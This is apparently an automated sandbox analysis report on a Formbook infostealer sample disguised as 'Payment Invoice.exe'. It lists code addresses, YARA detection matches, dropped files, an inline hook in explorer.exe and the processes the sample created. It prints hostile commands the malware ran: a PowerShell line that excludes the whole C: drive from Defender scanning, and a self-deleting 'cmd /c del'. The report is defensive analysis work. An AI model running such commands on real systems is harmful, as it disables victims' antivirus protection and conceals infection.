Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_00402FB0	14_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_00C9A067	14_2_00C9A067
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_00C99C5F	14_2_00C99C5F
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016E4120	14_2_016E4120
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016CF900	14_2_016CF900
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0179E824	14_2_0179E824
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01781002	14_2_01781002
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_017928EC	14_2_017928EC
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F20A0	14_2_016F20A0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_017920A8	14_2_017920A8
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016DB090	14_2_016DB090
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01792B28	14_2_01792B28
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_017803DA	14_2_017803DA
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0178DBD2	14_2_0178DBD2
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016FEBB0	14_2_016FEBB0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0177FA2B	14_2_0177FA2B
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_017922AE	14_2_017922AE
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01791D55	14_2_01791D55
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016C0D20	14_2_016C0D20
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01792D07	14_2_01792D07
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016DD5E0	14_2_016DD5E0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_017925DD	14_2_017925DD
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F2581	14_2_016F2581
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0178D466	14_2_0178D466
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016D841F	14_2_016D841F
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01791FF1	14_2_01791FF1
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0179DFCE	14_2_0179DFCE
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016E6E30	14_2_016E6E30
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0178D616	14_2_0178D616
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01792EF7	14_2_01792EF7
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037B2B28	21_2_037B2B28
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037A03DA	21_2_037A03DA
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037ADBD2	21_2_037ADBD2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0371EBB0	21_2_0371EBB0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037B22AE	21_2_037B22AE
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03704120	21_2_03704120
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036EF900	21_2_036EF900
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037BE824	21_2_037BE824
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037A1002	21_2_037A1002
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037B28EC	21_2_037B28EC
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037120A0	21_2_037120A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037B20A8	21_2_037B20A8
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036FB090	21_2_036FB090
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037B1FF1	21_2_037B1FF1
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037BDFCE	21_2_037BDFCE
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03706E30	21_2_03706E30
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037AD616	21_2_037AD616
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037B2EF7	21_2_037B2EF7
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037B1D55	21_2_037B1D55
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036E0D20	21_2_036E0D20
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037B2D07	21_2_037B2D07
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036FD5E0	21_2_036FD5E0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037B25DD	21_2_037B25DD
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03712581	21_2_03712581
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037AD466	21_2_037AD466
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_036F841F	21_2_036F841F
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_02E4E1FF	21_2_02E4E1FF
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_02E39E2B	21_2_02E39E2B
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_02E39E30	21_2_02E39E30
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_02E4DFCE	21_2_02E4DFCE
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_02E32FB0	21_2_02E32FB0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_02E32D90	21_2_02E32D90
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_02E4D500	21_2_02E4D500

Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: String function: 016CB150 appears 45 times
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: String function: 036EB150 appears 45 times

Source: Payment Invoice.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Payment Invoice.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: Payment Invoice.exe, 00000001.00000002.731308323.0000000007020000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameRjqqecywmhbkk.dll" vs Payment Invoice.exe
Source: Payment Invoice.exe, 00000001.00000002.720984105.00000000039B9000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs Payment Invoice.exe
Source: Payment Invoice.exe, 00000001.00000002.719312419.0000000000D1A000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Payment Invoice.exe
Source: Payment Invoice.exe, 00000001.00000002.717404896.000000000055E000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameMstkztz.exeH vs Payment Invoice.exe
Source: Payment Invoice.exe, 00000001.00000002.730879897.0000000006E30000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs Payment Invoice.exe
Source: Payment Invoice.exe, 0000000D.00000002.714359819.00000000001BE000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameMstkztz.exeH vs Payment Invoice.exe
Source: Payment Invoice.exe, 0000000E.00000002.782780518.00000000017BF000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Payment Invoice.exe
Source: Payment Invoice.exe, 0000000E.00000002.783600044.0000000003426000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameWWAHost.exej% vs Payment Invoice.exe
Source: Payment Invoice.exe, 0000000E.00000000.715328773.0000000000C9E000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameMstkztz.exeH vs Payment Invoice.exe
Source: Payment Invoice.exe	Binary or memory string: OriginalFilenameMstkztz.exeH vs Payment Invoice.exe

Source: Payment Invoice.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: 00000015.00000002.908858875.0000000000380000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.908858875.0000000000380000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.721973230.0000000003C24000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.721973230.0000000003C24000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.782477108.0000000001660000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.782477108.0000000001660000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.782306537.0000000001230000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.782306537.0000000001230000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.721408933.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.721408933.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 14.2.Payment Invoice.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 14.2.Payment Invoice.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Payment Invoice.exe.3ad1990.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.Payment Invoice.exe.3ad1990.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 14.2.Payment Invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 14.2.Payment Invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: Payment Invoice.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Payment Invoice.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@13/8@2/1

Source: C:\Users\user\Desktop\Payment Invoice.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment Invoice.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6892:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6728:120:WilError_01

Source: C:\Users\user\Desktop\Payment Invoice.exe

File created: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe

Jump to behavior

Source: Payment Invoice.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Payment Invoice.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\Desktop\Payment Invoice.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Payment Invoice.exe	Virustotal: Detection: 33%
Source: Payment Invoice.exe	ReversingLabs: Detection: 29%

Source: C:\Users\user\Desktop\Payment Invoice.exe

File read: C:\Users\user\Desktop\Payment Invoice.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Payment Invoice.exe 'C:\Users\user\Desktop\Payment Invoice.exe'
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process created: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe C:\Users\user\AppData\Local\Temp\Payment Invoice.exe
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process created: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe C:\Users\user\AppData\Local\Temp\Payment Invoice.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
Source: C:\Windows\SysWOW64\WWAHost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\Payment Invoice.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process created: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process created: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\Payment Invoice.exe'	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Payment Invoice.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Payment Invoice.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Payment Invoice.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: WWAHost.pdb source: Payment Invoice.exe, 0000000E.00000002.783465280.0000000003370000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000000F.00000000.750469066.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: WWAHost.pdbUGP source: Payment Invoice.exe, 0000000E.00000002.783465280.0000000003370000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: Payment Invoice.exe, 0000000E.00000002.782780518.00000000017BF000.00000040.00000001.sdmp, WWAHost.exe, 00000015.00000002.910484739.00000000036C0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Payment Invoice.exe, WWAHost.exe
Source:	Binary string: C:\Development\Releases\Json\Working\Newtonsoft.Json\Working-Signed\Src\Newtonsoft.Json\obj\Release\Net40\Newtonsoft.Json.pdb source: Payment Invoice.exe, 00000001.00000002.720984105.00000000039B9000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 0000000F.00000000.750469066.0000000005A00000.00000002.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: Payment Invoice.exe, u0002u2000.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: Payment Invoice.exe.1.dr, u0002u2000.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.Payment Invoice.exe.4e0000.0.unpack, u0002u2000.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.2.Payment Invoice.exe.4e0000.0.unpack, u0002u2000.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.0.Payment Invoice.exe.140000.0.unpack, u0002u2000.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.2.Payment Invoice.exe.140000.0.unpack, u0002u2000.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 14.0.Payment Invoice.exe.c20000.0.unpack, u0002u2000.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 14.2.Payment Invoice.exe.c20000.1.unpack, u0002u2000.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Yara detected Costura Assembly Loader

Show sources

Source: Yara match	File source: Payment Invoice.exe, type: SAMPLE
Source: Yara match	File source: 00000001.00000002.716578799.00000000004E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.714247594.0000000000142000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.909529703.00000000007AA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.912797173.0000000003BEF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.715166926.0000000000C22000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.720423226.00000000029B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.712145494.0000000007311000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.713411338.0000000000142000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.781781512.0000000000C22000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.640844843.00000000004E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: WWAHost.exe PID: 6992, type: MEMORY
Source: Yara match	File source: Process Memory Space: Payment Invoice.exe PID: 6744, type: MEMORY
Source: Yara match	File source: Process Memory Space: Payment Invoice.exe PID: 6948, type: MEMORY
Source: Yara match	File source: Process Memory Space: Payment Invoice.exe PID: 6860, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe, type: DROPPED
Source: Yara match	File source: 21.2.WWAHost.exe.3bef834.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.Payment Invoice.exe.c20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.WWAHost.exe.3bef834.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.Payment Invoice.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.Payment Invoice.exe.c20000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Payment Invoice.exe.4e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Payment Invoice.exe.4e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.Payment Invoice.exe.140000.0.unpack, type: UNPACKEDPE

Source: C:\Users\user\Desktop\Payment Invoice.exe	Code function: 1_2_06E174C7 push es; iretd	1_2_06E174C8
Source: C:\Users\user\Desktop\Payment Invoice.exe	Code function: 1_2_06E1D0FF push ecx; iretd	1_2_06E1D101
Source: C:\Users\user\Desktop\Payment Invoice.exe	Code function: 1_2_06E1D16B push es; iretd	1_2_06E1D170
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0041D0D2 push eax; ret	14_2_0041D0D8
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0041D0DB push eax; ret	14_2_0041D142
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0041D085 push eax; ret	14_2_0041D0D8
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0041D13C push eax; ret	14_2_0041D142
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_00416A40 pushad ; retf	14_2_00416A42
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0040E24A push es; iretd	14_2_0040E26B
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0040E250 push es; iretd	14_2_0040E26B
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_00418DCD push edi; retf	14_2_00418DCE
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0041659D push edi; iretd	14_2_004165A3
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0171D0D1 push ecx; ret	14_2_0171D0E4
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0373D0D1 push ecx; ret	21_2_0373D0E4
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_02E46A40 pushad ; retf	21_2_02E46A42
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_02E3E24A push es; iretd	21_2_02E3E26B
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_02E3E250 push es; iretd	21_2_02E3E26B
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_02E4D0D2 push eax; ret	21_2_02E4D0D8
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_02E4D0DB push eax; ret	21_2_02E4D142
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_02E4D085 push eax; ret	21_2_02E4D0D8
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_02E4D13C push eax; ret	21_2_02E4D142
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_02E48DCD push edi; retf	21_2_02E48DCE
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_02E4659D push edi; iretd	21_2_02E465A3

Source: initial sample	Static PE information: section name: .text entropy: 7.98286833797
Source: initial sample	Static PE information: section name: .text entropy: 7.98286833797

Source: C:\Users\user\Desktop\Payment Invoice.exe

File created: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE2

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
